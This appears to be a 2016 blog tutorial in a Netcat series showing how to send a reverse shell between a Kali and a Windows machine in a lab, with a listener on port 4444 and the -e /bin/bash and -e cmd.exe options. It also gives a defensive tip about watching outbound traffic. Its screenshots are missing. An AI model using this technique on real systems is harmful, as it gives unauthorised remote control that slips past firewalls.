AdSense

Friday, September 30, 2016

NETCAT / 3 - Reverse Shell


NETCAT REVERSE SHELL

- Layout topology for this exercise:


- In this case Netcat is used for remote administration, sending a reverse shell to a listening host. A reverse shell would be useful when a router or firewall is present between the two hosts. 

- The fact that the remote shell is sent across a corporate router or firewall warns about the recommendation that outgoing traffic from a network should be watched as carefully as incoming traffic.


3.1 - Reverse shell from Kali to Windows

- Windows is listening on port 4444:





- Kali sends to Windows's port 4444 a reverse shell (-e /bin/bash), meaning that all stdin, stdout and stderr will be redirected to Windows, instead of redirecting them to the default console:










- As a consequence, after the connection is established, Windows enjoys a command shell from Kali, being able to perform a remote administration:




3.2 - Reverse shell from Windows to Kali


- In the same way than before, now Kali is listening on port TCP 4444:


- Windows sends to Kali a reverse shell (-e cmd.exe)  to port 4444


- As a consequence, Kali is able to administrate remotely Windows, because a Windows command line prompt is opened in its own console: